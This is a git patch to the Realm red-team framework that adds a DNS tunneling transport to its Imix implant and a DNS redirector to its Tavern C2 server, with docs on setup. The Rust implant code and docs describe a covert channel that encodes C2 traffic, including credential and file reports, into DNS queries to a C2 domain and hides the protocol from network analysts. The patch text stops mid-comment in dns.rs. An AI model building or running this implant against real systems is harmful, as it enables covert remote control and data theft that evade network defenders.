From b124671b5e86b721a6e57a1d43b83ef668f36feb Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 28 Nov 2025 00:39:17 -0600 Subject: [PATCH 01/17] =?UTF-8?q?DNS=20transport=20=F0=9F=94=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- docs/_docs/admin-guide/tavern.md | 62 +- docs/_docs/dev-guide/imix.md | 126 ++- docs/_docs/user-guide/imix.md | 37 +- implants/imix/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 3 + implants/lib/transport/src/dns.rs | 1410 ++++++++++++++++++++++++ implants/lib/transport/src/lib.rs | 11 + tavern/app.go | 1 + tavern/internal/redirectors/dns/dns.go | 1047 ++++++++++++++++++ 9 files changed, 2662 insertions(+), 36 deletions(-) create mode 100644 implants/lib/transport/src/dns.rs create mode 100644 tavern/internal/redirectors/dns/dns.go diff --git a/docs/_docs/admin-guide/tavern.md b/docs/_docs/admin-guide/tavern.md index 66f4d99c9..a924b87ce 100644 --- a/docs/_docs/admin-guide/tavern.md +++ b/docs/_docs/admin-guide/tavern.md @@ -104,7 +104,67 @@ Below are some deployment gotchas and notes that we try to address with Terrafor ## Redirectors -By default Tavern only supports GRPC connections directly to the server. To Enable additional protocols or additional IPs / Domain names in your callbacks utilize tavern redirectors which recieve traffic using a specific protocol like HTTP/1.1 and then forward it to an upstream tavern server over GRPC. See: `tavern redirector -help` +By default Tavern only supports gRPC connections directly to the server. To enable additional protocols or additional IPs/domain names in your callbacks, utilize Tavern redirectors which receive traffic using a specific protocol (like HTTP/1.1 or DNS) and then forward it to an upstream Tavern server over gRPC. + +### Available Redirectors + +Realm includes three built-in redirector implementations: + +- **`grpc`** - Direct gRPC passthrough redirector +- **`http1`** - HTTP/1.1 to gRPC redirector +- **`dns`** - DNS to gRPC redirector + +### Basic Usage + +List available redirectors: + +```bash +tavern redirector list +``` + +Start a redirector: + +```bash +tavern redirector --transport --listen +``` + +### HTTP/1.1 Redirector + +The HTTP/1.1 redirector accepts HTTP/1.1 traffic from agents and forwards it to an upstream gRPC server. + +```bash +# Start HTTP/1.1 redirector on port 8080 +tavern redirector --transport http1 --listen ":8080" localhost:8000 +``` + +### DNS Redirector + +The DNS redirector tunnels C2 traffic through DNS queries and responses, providing a covert communication channel. It supports TXT, A, and AAAA record types. + +```bash +# Start DNS redirector on UDP port 53 for domain c2.example.com +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com" localhost:8000 + +# Support multiple domains +tavern redirector --transport dns --listen "0.0.0.0:53?domain=c2.example.com&domain=backup.example.com" localhost:8000 +``` + +**DNS Configuration Requirements:** + +1. Configure your DNS server to delegate queries for your C2 domain to the redirector IP +2. Or run the redirector as your authoritative DNS server for the domain +3. Ensure UDP port 53 is accessible + +See the [DNS Transport Configuration](/user-guide/imix#dns-transport-configuration) section in the Imix user guide for more details on agent-side configuration. + +### gRPC Redirector + +The gRPC redirector provides a passthrough for gRPC traffic, useful for deploying multiple Tavern endpoints or load balancing. + +```bash +# Start gRPC redirector on port 9000 +tavern redirector --transport grpc --listen ":9000" localhost:8000 +``` ## Configuration diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index 65fed4035..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -91,29 +91,45 @@ pub use mac_address::MacAddress; ## Develop a New Transport -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is complete abstracted from how Imix operates for callbacks/tome excution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. -If creating a new Transport create a new file in the directory and name it after the protocol you plan to use. For example, if writing a DNS Transport then call your file `dns.rs`. Then define your public struct where any connection state/clients will be. For example, +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, ```rust #[derive(Debug, Clone)] -pub struct DNS { - dns_client: Option +pub struct Custom { + // Your connection state here + // e.g., client: Option } ``` -NOTE: Depending on the struct you build, you may need to derive certain features, see above we derive `Debug` and `Clone`. +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. Next, we need to implement the Transport trait for our new struct. This will look like: ```rust -impl Transport for DNS { +impl Transport for Custom { fn init() -> Self { - DNS{ dns_client: None } + Custom { + // Initialize your connection state here + // e.g., client: None + } } fn new(callback: String, proxy_uri: Option) -> Result { // TODO: setup connection/client hook in proxy, anything else needed - // before fuctions get called. + // before functions get called. Err(anyhow!("Unimplemented!")) } async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { @@ -169,20 +185,35 @@ impl Transport for DNS { NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. -After you implement all the functions/write in a decent error message for operators to understad why the function call failed then you need to import the Transport to the broader lib scope. To do this open up `realm/implants/lib/transport/src/lib.rs` and add in your new Transport like so: +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: -```rust -// more stuff above +#### 1. Add Compile-Time Exclusivity Checks -#[cfg(feature = "dns")] -mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS; +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: -// more stuff below +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... + +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; ``` -Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/transport/Cargo.toml`. +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: ```toml # more stuff above @@ -190,38 +221,65 @@ Also add your new feature to the Transport Cargo.toml at `realm/implants/lib/tra [features] default = [] grpc = [] -dns = [] # <-- see here +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here mock = ["dep:mockall"] +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + # more stuff below ``` -And that's it! Well, unless you want to _use_ the new transport. In which case you need to swap out the chosen transport being compiled for Imix in it's Cargo.toml (`/workspaces/realm/implants/lib/transport/Cargo.toml`) like so +#### 3. Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: ```toml # more stuff above -[dependencies] -eldritch = { workspace = true, features = ["imix"] } -pb = { workspace = true } -transport = { workspace = true, features = ["dns"] } # <-- see here -host_unique = { workspace = true } +[features] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport +http1 = ["transport/http1"] +dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here +transport-grpc-doh = ["transport/grpc-doh"] # more stuff below ``` -Then just swap which Transport gets intialized on Imix's `run` function in run.rs (`/workspaces/realm/implants/imix/src/run.rs`) accordingly, +#### 4. Build Imix with Your Transport -```rust -// more stuff above +Compile imix with your custom transport: -async fn run(cfg: Config) -> anyhow::Result<()> { - let mut agent = Agent::new(cfg, DNS::init())?; // <-- changed this (also imported it) - agent.callback_loop().await?; - Ok(()) -} +```bash +# From the repository root +cd implants/imix -// more stuff below +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release ``` -And that's all that is needed for Imix to use a new Transport! Now all there is to do is setup some sort of tavern proxy for your new protocol and test! +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index b261645e2..f01d6e67a 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -15,7 +15,7 @@ Imix has compile-time configuration, that may be specified using environment var | Env Var | Description | Default | Required | | ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:8000` | No | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | | IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | - | Yes | | IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | | IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | @@ -30,6 +30,8 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | + + ## Logging At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. @@ -97,6 +99,7 @@ These flags are passed to cargo build Eg.: - `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport - `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. +- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. ### Linux @@ -171,3 +174,35 @@ cargo build --release --features win_service --target=x86_64-pc-windows-gnu # Build imix.dll cargo build --release --lib --target=x86_64-pc-windows-gnu ``` + + +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either a specific DNS server or the system's default resolver. + +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns:///[?type=&fallback=] +``` + +**Parameters:** +- `` - DNS server IP address, or `*` to use system resolver (recommended) +- `` - Base domain for DNS queries (e.g., `c2.example.com` will result in queries like `abcd1234.c2.example.com`) +- `type` (optional) - Preferred DNS record type: `TXT` (default), `A`, or `AAAA` +- `fallback` (optional) - Enable automatic fallback to other record types on failure (default: `true`) + +**Examples:** + +```bash +# Use specific DNS server (8.8.8.8) with TXT records and fallback enabled +export IMIX_CALLBACK_URI="dns://8.8.8.8/c2.example.com" + +# Use system resolver, prefer A records only +export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=A" + +# Use system resolver with AAAA records and no fallback +export IMIX_CALLBACK_URI="dns://*/c2.example.com?type=AAAA&fallback=false" +``` diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index 844344d8f..5c1c55b08 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -11,6 +11,7 @@ crate-type = ["cdylib"] win_service = [] default = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] transport-grpc-doh = ["transport/grpc-doh"] [dependencies] diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 29885ad59..266e6305c 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,6 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] +dns = ["dep:data-encoding", "dep:rand"] mock = ["dep:mockall"] [dependencies] @@ -27,6 +28,8 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } +data-encoding = { version = "2.9.0", optional = true } +rand = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs new file mode 100644 index 000000000..12cd3570f --- /dev/null +++ b/implants/lib/transport/src/dns.rs @@ -0,0 +1,1410 @@ +use anyhow::{Context, Result}; +use pb::c2::*; +use prost::Message; +use std::sync::mpsc::{Receiver, Sender}; +use tokio::net::UdpSocket; + +use crate::Transport; + +// DNS protocol limits +const DNS_HEADER_SIZE: usize = 12; // Standard DNS header size +const MAX_LABEL_LENGTH: usize = 63; // Maximum bytes in a DNS label +const TXT_RECORD_TYPE: u16 = 16; // TXT record QTYPE +const A_RECORD_TYPE: u16 = 1; // A record QTYPE +const AAAA_RECORD_TYPE: u16 = 28; // AAAA record QTYPE +const DNS_CLASS_IN: u16 = 1; // Internet class + +// Record type fallback priority (TXT has highest capacity) +const RECORD_TYPE_PRIORITY: &[u16] = &[TXT_RECORD_TYPE, AAAA_RECORD_TYPE, A_RECORD_TYPE]; + +// Protocol field sizes (base36 encoding) +const TYPE_SIZE: usize = 1; // Packet type: i/d/e/f +const SEQ_SIZE: usize = 5; // Sequence: 36^5 = 60,466,176 max chunks +const CONV_ID_SIZE: usize = 12; // Conversation ID length +const HEADER_SIZE: usize = TYPE_SIZE + SEQ_SIZE + CONV_ID_SIZE; +const MAX_DNS_NAME_LEN: usize = 253; // DNS max total domain name length + +// Packet types +const TYPE_INIT: char = 'i'; // Init: establish conversation +const TYPE_DATA: char = 'd'; // Data: send chunk +const TYPE_END: char = 'e'; // End: finalize and process +const TYPE_FETCH: char = 'f'; // Fetch: retrieve response chunk + +// Response prefixes (TXT records) +const RESP_OK: &str = "ok:"; // Success with data +const RESP_MISSING: &str = "m:"; // Missing chunks list +const RESP_ERROR: &str = "e:"; // Error message +const RESP_CHUNKED: &str = "r:"; // Response chunked metadata + +// Retry configuration +const MAX_RETRIES: usize = 5; +const INIT_TIMEOUT_SECS: u64 = 15; +const CHUNK_TIMEOUT_SECS: u64 = 20; +const EXCHANGE_MAX_RETRIES: usize = 5; +const EXCHANGE_RETRY_DELAY_SECS: u64 = 3; + +// gRPC method paths +static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; +static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; +static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; +static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; +static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; +static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; + +fn marshal_with_codec(msg: Req) -> Result> +where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, +{ + pb::xchacha::encode_with_chacha::(msg) +} + +fn unmarshal_with_codec(data: &[u8]) -> Result +where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, +{ + pb::xchacha::decode_with_chacha::(data) +} + +/// Map gRPC method path to 2-character code +/// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, +/// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput +fn method_to_code(method: &str) -> String { + match method { + "/c2.C2/ClaimTasks" => "ct".to_string(), + "/c2.C2/FetchAsset" => "fa".to_string(), + "/c2.C2/ReportCredential" => "rc".to_string(), + "/c2.C2/ReportFile" => "rf".to_string(), + "/c2.C2/ReportProcessList" => "rp".to_string(), + "/c2.C2/ReportTaskOutput" => "rt".to_string(), + _ => "ct".to_string(), + } +} + +/// DNS transport implementation +/// +/// Tunnels C2 traffic through DNS queries and responses using a +/// conversation-based protocol with init, data, end, and fetch packets. +/// Supports TXT, A, and AAAA record types with automatic fallback. +#[derive(Debug, Clone)] +pub struct DNS { + dns_server: Option, // None = use system resolver + base_domain: String, + socket: Option>, + preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) + current_record_type: u16, // Current type (may change after fallback) + enable_fallback: bool, // Whether to try other types on failure +} + +impl DNS { + /// Calculate maximum data size per chunk + /// After base32-encoding entire packet [type:1][seq:5][convid:12][data...] + /// Base32 expands by 8/5 = 1.6x, so work backwards from DNS name limit + fn calculate_max_data_size(&self) -> usize { + let base_with_dot = self.base_domain.len() + 1; + let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); + + // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= total_available + // Solve for data: data <= (total_available * 5 / 8) - HEADER_SIZE + let max_raw_packet = (total_available * 5) / 8; + max_raw_packet.saturating_sub(HEADER_SIZE) + } + + /// Generate a random conversation ID + fn generate_conv_id() -> String { + use rand::Rng; + let mut rng = rand::thread_rng(); + let bytes: [u8; 8] = rng.gen(); + Self::encode_base32(&bytes)[..CONV_ID_SIZE].to_string() + } + + fn encode_seq(seq: usize) -> String { + const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; + let digit4 = (seq / 1679616) % 36; // 36^4 + let digit3 = (seq / 46656) % 36; // 36^3 + let digit2 = (seq / 1296) % 36; // 36^2 + let digit1 = (seq / 36) % 36; // 36^1 + let digit0 = seq % 36; // 36^0 + format!( + "{}{}{}{}{}", + BASE36[digit4] as char, + BASE36[digit3] as char, + BASE36[digit2] as char, + BASE36[digit1] as char, + BASE36[digit0] as char + ) + } + + fn decode_seq(encoded: &str) -> Result { + let chars: Vec = encoded.chars().collect(); + if chars.len() != 5 { + return Err(anyhow::anyhow!( + "Invalid sequence length: expected 5, got {}", + chars.len() + )); + } + + let val = |c: char| -> Result { + match c { + '0'..='9' => Ok((c as usize) - ('0' as usize)), + 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), + _ => Err(anyhow::anyhow!("Invalid base36 character")), + } + }; + + Ok(val(chars[0])? * 1679616 + + val(chars[1])? * 46656 + + val(chars[2])? * 1296 + + val(chars[3])? * 36 + + val(chars[4])?) + } + + /// Calculate CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) + fn calculate_crc16(data: &[u8]) -> u16 { + let mut crc: u16 = 0xFFFF; + for byte in data { + crc ^= (*byte as u16) << 8; + for _ in 0..8 { + if (crc & 0x8000) != 0 { + crc = (crc << 1) ^ 0x1021; + } else { + crc <<= 1; + } + } + } + crc + } + + /// Encode CRC16 to 4-digit base36 (for init payload and response metadata only) + fn encode_base36_crc(crc: u16) -> String { + const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; + let crc_val = crc as usize; + let digit3 = (crc_val / 46656) % 36; // 36^3 + let digit2 = (crc_val / 1296) % 36; // 36^2 + let digit1 = (crc_val / 36) % 36; // 36^1 + let digit0 = crc_val % 36; // 36^0 + format!( + "{}{}{}{}", + BASE36[digit3] as char, + BASE36[digit2] as char, + BASE36[digit1] as char, + BASE36[digit0] as char + ) + } + + /// Decode 4-digit base36 CRC + fn decode_base36_crc(encoded: &str) -> Result { + let chars: Vec = encoded.chars().collect(); + if chars.len() != 4 { + return Err(anyhow::anyhow!( + "Invalid CRC length: expected 4, got {}", + chars.len() + )); + } + + let val = |c: char| -> Result { + match c { + '0'..='9' => Ok((c as usize) - ('0' as usize)), + 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), + _ => Err(anyhow::anyhow!("Invalid base36 character in CRC")), + } + }; + + let crc = + val(chars[0])? * 46656 + val(chars[1])? * 1296 + val(chars[2])? * 36 + val(chars[3])?; + Ok(crc as u16) + } + + /// Encode data to lowercase base32 without padding + fn encode_base32(data: &[u8]) -> String { + use data_encoding::BASE32_NOPAD; + BASE32_NOPAD.encode(data).to_lowercase() + } + + /// Decode lowercase base32 data without padding + fn decode_base32(encoded: &str) -> Result> { + use data_encoding::BASE32_NOPAD; + BASE32_NOPAD + .decode(encoded.to_uppercase().as_bytes()) + .context("Failed to decode base32") + } + + /// Build packet subdomain with opaque base32 encoding + /// Entire packet structure is base32-encoded: [type:1][seq:5][convid:12][raw_data_bytes...] + /// This hides the protocol structure from network analysts + fn build_packet( + &self, + pkt_type: char, + seq: usize, + conv_id: &str, + raw_data: &[u8], + ) -> Result { + let max_data_size = self.calculate_max_data_size(); + + let truncated_data = if raw_data.len() > max_data_size { + &raw_data[..max_data_size] + } else { + raw_data + }; + + // Build raw packet: [type:1][seq:5][convid:12][raw_bytes...] + let mut packet = Vec::new(); + packet.push(pkt_type as u8); + packet.extend_from_slice(Self::encode_seq(seq).as_bytes()); + packet.extend_from_slice(conv_id.as_bytes()); + packet.extend_from_slice(truncated_data); + + // Base32-encode entire packet (makes it opaque) + let encoded_packet = Self::encode_base32(&packet); + + // Split into DNS labels (63 chars each) + let mut labels = Vec::new(); + for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { + labels.push(String::from_utf8_lossy(chunk).to_string()); + } + + Ok(labels.join(".")) + } + + /// Build init packet with plaintext payload + /// Format (before base32): [i][00000][conv_id][method_code:2][total_chunks:5][crc:4] + fn build_init_packet(conv_id: &str, plaintext_payload: &str) -> Result { + // Build raw packet + let mut packet = Vec::new(); + packet.push(TYPE_INIT as u8); + packet.extend_from_slice(Self::encode_seq(0).as_bytes()); + packet.extend_from_slice(conv_id.as_bytes()); + packet.extend_from_slice(plaintext_payload.as_bytes()); + + // Base32-encode entire packet + let encoded_packet = Self::encode_base32(&packet); + + // Split into DNS labels + let mut labels = Vec::new(); + for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { + labels.push(String::from_utf8_lossy(chunk).to_string()); + } + + Ok(labels.join(".")) + } + + /// Build a DNS query for the specified record type + fn build_dns_query(&self, subdomain: &str, transaction_id: u16, record_type: u16) -> Vec { + let mut query = Vec::new(); + + // DNS Header (12 bytes) + query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID + query.extend_from_slice(&[0x01, 0x00]); // Flags: Standard query + query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 + query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); // Additional RRs: 0 + + // Question section + let fqdn = format!("{}.{}", subdomain, self.base_domain); + for label in fqdn.split('.') { + if label.is_empty() { + continue; + } + query.push(label.len() as u8); + query.extend_from_slice(label.as_bytes()); + } + query.push(0x00); // End of domain name + + query.extend_from_slice(&record_type.to_be_bytes()); // Type: TXT/A/AAAA + query.extend_from_slice(&DNS_CLASS_IN.to_be_bytes()); // Class: IN + + query + } + + /// Parse a DNS response and extract record data (TXT, A, or AAAA) + fn parse_dns_response(&self, response: &[u8]) -> Result> { + if response.len() < DNS_HEADER_SIZE { + return Err(anyhow::anyhow!("Response too short")); + } + + // Parse header + let answer_count = u16::from_be_bytes([response[6], response[7]]); + if answer_count == 0 { + return Ok(Vec::new()); // Empty response + } + + // Skip question section + let mut offset = DNS_HEADER_SIZE; + + // Parse domain name in question + while offset < response.len() && response[offset] != 0 { + let len = response[offset] as usize; + if len == 0 || offset + len >= response.len() { + break; + } + offset += 1 + len; + } + offset += 1; // Skip null terminator + offset += 4; // Skip QTYPE and QCLASS + + // Parse answer section + let mut record_data = Vec::new(); + + for _ in 0..answer_count { + if offset + 12 > response.len() { + break; + } + + // Skip name (with compression support) + while offset < response.len() { + let b = response[offset]; + if b == 0 { + offset += 1; + break; + } else if (b & 0xC0) == 0xC0 { + // Pointer + offset += 2; + break; + } else { + offset += 1 + (b as usize); + } + } + + if offset + 10 > response.len() { + break; + } + + let rtype = u16::from_be_bytes([response[offset], response[offset + 1]]); + offset += 8; // Skip TYPE, CLASS, TTL + let rdlength = u16::from_be_bytes([response[offset], response[offset + 1]]); + offset += 2; + + if rtype == TXT_RECORD_TYPE { + // TXT record - extract text data + let rdata_end = offset + rdlength as usize; + while offset < rdata_end && offset < response.len() { + let txt_len = response[offset] as usize; + offset += 1; + if offset + txt_len <= response.len() && offset + txt_len <= rdata_end { + record_data.extend_from_slice(&response[offset..offset + txt_len]); + offset += txt_len; + } else { + break; + } + } + } else if rtype == A_RECORD_TYPE || rtype == AAAA_RECORD_TYPE { + // A or AAAA record - extract IP address bytes + if offset + rdlength as usize <= response.len() { + record_data.extend_from_slice(&response[offset..offset + rdlength as usize]); + offset += rdlength as usize; + } + } else { + offset += rdlength as usize; + } + } + + Ok(record_data) + } + + /// Send a single DNS query and receive response, with record type fallback + async fn send_query(&mut self, subdomain: &str) -> Result> { + use rand::Rng; + + let socket = self + .socket + .as_ref() + .ok_or_else(|| anyhow::anyhow!("Socket not initialized"))?; + + // Determine which record types to try + let record_types_to_try: Vec = if self.enable_fallback { + // Try all record types in priority order, but start with preferred + let mut types = Vec::new(); + types.push(self.preferred_record_type); + for &rt in RECORD_TYPE_PRIORITY { + if rt != self.preferred_record_type { + types.push(rt); + } + } + types + } else { + // Only try the preferred record type + vec![self.preferred_record_type] + }; + + // Try each record type + for &record_type in &record_types_to_try { + #[cfg(debug_assertions)] + { + let type_name = match record_type { + TXT_RECORD_TYPE => "TXT", + A_RECORD_TYPE => "A", + AAAA_RECORD_TYPE => "AAAA", + _ => "UNKNOWN", + }; + log::trace!("Attempting DNS query with record type: {}", type_name); + } + + // Generate random transaction ID + let transaction_id: u16 = rand::thread_rng().gen(); + let query = self.build_dns_query(subdomain, transaction_id, record_type); + + // Determine DNS server to use + let target = if let Some(ref server) = self.dns_server { + server.clone() + } else { + // Use system resolver - send to localhost:53 + "127.0.0.1:53".to_string() + }; + + // Send query + match socket.send_to(&query, &target).await { + Ok(_) => {} + Err(e) => { + #[cfg(debug_assertions)] + log::trace!("Failed to send query: {}", e); + continue; // Try next record type + } + } + + // Receive response(s) until we get one with matching transaction ID + let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(5); + let mut buf = [0u8; 4096]; + + loop { + let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); + if remaining.is_zero() { + // Timeout - try next record type + break; + } + + match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { + Ok(Ok((len, _))) => { + // Check if transaction ID matches + if len >= 2 { + let response_id = u16::from_be_bytes([buf[0], buf[1]]); + if response_id == transaction_id { + // Check for DNS error (RCODE in flags) + if len >= 4 { + let rcode = buf[3] & 0x0F; // Last 4 bits of flags + if rcode != 0 { + // DNS error response - try next record type + #[cfg(debug_assertions)] + log::trace!("DNS error response, RCODE={}", rcode); + break; + } + } + + // Matching response found + match self.parse_dns_response(&buf[..len]) { + Ok(data) => { + // Accept both empty and non-empty responses + // (data packets return empty ACK, others return data) + self.current_record_type = record_type; + return Ok(data); + } + Err(_) => { + break; + } + } + } + // Wrong transaction ID - keep waiting for the right one + #[cfg(debug_assertions)] + log::trace!("Ignoring DNS response with mismatched transaction ID: expected {}, got {}", transaction_id, response_id); + } + } + Ok(Err(e)) => { + #[cfg(debug_assertions)] + log::trace!("Failed to receive response: {}", e); + break; // Try next record type + } + Err(_) => { + // Timeout - try next record type + break; + } + } + } + } + + // All record types failed + Err(anyhow::anyhow!("All DNS record types failed")) + } + + /// Send init packet and receive conversation ID from server + /// Init payload: [method_code:2][total_chunks:5][crc:4] + async fn send_init( + &mut self, + method: &str, + total_chunks: usize, + data_crc: u16, + ) -> Result { + let method_code = method_to_code(method); + let temp_conv_id = Self::generate_conv_id(); + + let total_chunks_encoded = Self::encode_seq(total_chunks); + let crc_encoded = Self::encode_base36_crc(data_crc); + let init_payload = format!("{}{}{}", method_code, total_chunks_encoded, crc_encoded); + + #[cfg(debug_assertions)] + log::debug!( + "send_init: method={}, total_chunks={}, total_chunks_encoded={}, crc={}, crc_encoded={}, init_payload={}", + method, + total_chunks, + total_chunks_encoded, + data_crc, + crc_encoded, + init_payload + ); + + let subdomain = Self::build_init_packet(&temp_conv_id, &init_payload)?; + + #[cfg(debug_assertions)] + log::debug!("Init packet subdomain: {}.{}", subdomain, self.base_domain); + + for attempt in 0..MAX_RETRIES { + #[cfg(debug_assertions)] + log::debug!( + "Sending init packet, attempt {}/{}, timeout={}s", + attempt + 1, + MAX_RETRIES, + INIT_TIMEOUT_SECS + ); + + match tokio::time::timeout( + tokio::time::Duration::from_secs(INIT_TIMEOUT_SECS), + self.send_query(&subdomain), + ) + .await + { + Ok(Ok(response)) if !response.is_empty() => { + // Check if response is binary chunked indicator (magic byte 0xFF) + if response.len() >= 4 && response[0] == 0xFF { + // Binary chunked indicator format (for A records): + // Byte 0: 0xFF (magic) + // Bytes 